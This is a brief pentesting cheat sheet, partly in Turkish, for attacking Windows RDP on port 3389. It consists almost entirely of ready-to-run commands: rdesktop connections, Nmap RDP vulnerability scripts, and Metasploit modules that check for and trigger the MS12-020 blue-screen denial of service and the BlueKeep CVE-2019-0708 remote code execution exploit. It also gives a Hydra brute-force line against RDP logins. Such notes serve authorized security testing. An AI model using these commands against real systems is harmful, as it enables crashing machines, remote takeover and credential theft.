Pentesting RDP - 3389

Connect RDP

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>

Nmap scripts

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T

DoS Attack (MS12-020 Free DoS)

Genellikle Windows 7 makinalarda görülen bu zafiyet ilgili cihaz da mavi ekrana sebep olmaktadır. Metasploit da bu zafiyetin varlığını kontrol edebileceğimiz ve sömürebileceğimiz iki ayrı modül bulunmaktadır.

Tespit için:

use auxiliary/scanner/rdp/ms12_020_check
set rhosts file://root/desktop/ip_list
exploit

Sömürmek için:

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhosts 10.10.10.10
exploit

BlueKeep (CVE-2019-0708)

Bununda yine kontrol ve exploit modülleri mevcut.

Tespit için:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 10.10.10.10
exploit

Sömürmek için:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 10.10.10.10
set target 5
exploit
sysinfo

BruteForce RDP

hydra -L user.txt -P pass.txt 10.10.10.10 rdp